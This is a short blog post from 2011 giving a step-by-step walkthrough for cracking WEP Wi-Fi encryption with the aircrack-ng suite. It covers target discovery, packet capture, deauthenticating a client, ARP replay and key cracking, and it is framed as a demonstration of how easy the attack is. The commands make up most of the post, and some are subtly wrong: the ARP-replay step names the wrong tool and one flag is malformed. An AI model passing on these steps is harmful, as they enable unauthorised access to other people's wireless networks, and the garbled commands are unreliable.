Minggu, 16 Oktober 2011


The privacy protocol specified in IEEE 802.11 to provide wireless LAN users protection against casual eavesdropping. WEP refers to the intent to provide a privacy service to wireless LAN users similar to that provided by the physical security inherent in a wired LAN.


yesterday I was explaining about cracking WPA2. and now I will show you how easy it is to cracking WEP. let's we see....



[+]  search the target "airodump-ng mon0"




[+] dump with detail target "airodump-ng -w nameFile -c (channel) -bssid (mac target) mon0"


[+] deauthenticate the victim "aireplay-ng -0 1 -a (mac target) mon0
[+] save ARP-request packets of our victim "airodump-ng -3 -b (mac target)"


[+] if the packet which we have gathered enough, now time to crack using aircrack-ng...!!!
"aircrack-ng nameFile.cap"

bingoooOOOOO....!!!

0 komentar:

Posting Komentar